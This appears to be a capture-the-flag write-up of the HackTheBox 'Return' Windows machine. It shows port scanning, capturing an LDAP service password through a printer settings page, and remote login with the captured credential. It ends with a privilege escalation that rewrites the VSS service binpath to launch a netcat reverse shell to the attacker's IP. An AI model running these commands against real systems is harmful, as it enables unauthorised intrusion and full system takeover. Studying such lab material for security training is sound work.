Return

An easy Windows box from HackTheBox, using an SSRF to capture a password, then modifying a service path to get SYSTEM.

Return

Recon

Usual nmap scan

sudo nmap -p- -sV -oA nmap/return 10.10.11.108

PORT      STATE SERVICE       VERSION  
53/tcp    open  domain        Simple DNS Plus  
80/tcp    open  http          Microsoft IIS httpd 10.0  
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-05-20 02:33:18Z)  
135/tcp   open  msrpc         Microsoft Windows RPC  
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn  
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: return.local0., Site: Default-First-Site-Name)  
445/tcp   open  microsoft-ds?  
464/tcp   open  kpasswd5?  
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0  
636/tcp   open  tcpwrapped  
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: return.local0., Site: Default-First-Site-Name)  
3269/tcp  open  tcpwrapped  
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)  
9389/tcp  open  mc-nmf        .NET Message Framing  
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)  
49664/tcp open  msrpc         Microsoft Windows RPC  
49665/tcp open  msrpc         Microsoft Windows RPC  
49666/tcp open  msrpc         Microsoft Windows RPC  
49667/tcp open  msrpc         Microsoft Windows RPC  
49671/tcp open  msrpc         Microsoft Windows RPC  
49674/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0  
49675/tcp open  msrpc         Microsoft Windows RPC  
49679/tcp open  msrpc         Microsoft Windows RPC  
49682/tcp open  msrpc         Microsoft Windows RPC  
49694/tcp open  msrpc         Microsoft Windows RPC  
Service Info: Host: PRINTER; OS: Windows; CPE: cpe:/o:microsoft:windows

Run an initial crackmapexec for some SMB enumeration

kali@kali-$ crackmapexec smb 10.10.11.108  

SMB         10.10.11.108    445    PRINTER          [*] Windows 10.0 Build 17763 x64 (name:PRINTER) (domain:return.local) (signing:True) (SMBv1:False)

Can also see a settings page when you navigate to the IP

Exploitation

The password is hidden, but can intercept the packet by putting in the kali machine’s IP, and listening with netcat when you hit the update button

nc -lnvp 389

listening on [any] 389 ...  
connect to [10.10.14.11] from (UNKNOWN) [10.10.11.108] 63570  
0*`%return\svc-printer�  
                      1edFg43012!!

Now we have both a user and password, svc-printer:1edFg43012!!

Now can use evil-winrm to get a cmd prompt on the box

evil-winrm -u svc-printer -p '1edFg43012!!' 10.10.11.108

And get the user flag

After enumerating the groups that the user is a part of, find that the svc-printer user has permissions to start and stop services

*Evil-WinRM* PS C:\Users\svc-printer\desktop> whoami /groups

GROUP INFORMATION
-----------------

Group Name                                 Type             SID          Attributes
========================================== ================ ============ ==================================================
Everyone                                   Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Server Operators                   Alias            S-1-5-32-549 Mandatory group, Enabled by default, Enabled group
BUILTIN\Print Operators                    Alias            S-1-5-32-550 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users            Alias            S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                       Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level       Label            S-1-16-12288

Then upload netcat.exe to setup a reverse shell as Admin

*Evil-WinRM* PS C:\Users\svc-printer> upload nc64.exe

Would like to get a list of the services that the user can modify, but svc-printer doesn’t have access to the service control manager (sc.exe)

*Evil-WinRM* PS C:\Users\svc-printer> sc.exe query
[SC] OpenSCManager FAILED 5:

Access is denied.

Instead we are going to modify an existing service that we know exists, VSS (Shadow Copy), and insert a malicious binpath to grab a reverse shell

*Evil-WinRM* PS C:\Users\svc-printer> sc.exe config VSS binpath="C:\Users\svc-printer\nc64.exe -e cmd 10.10.14.11 8000"

Then stop the service

sc.exe stop VSS

And start the netcat listener, and start the service - grabbing an Admin shell and SYSTEM access

sc.exe start VSS

Return

Return #

Recon #

Exploitation #

Return

Recon

Exploitation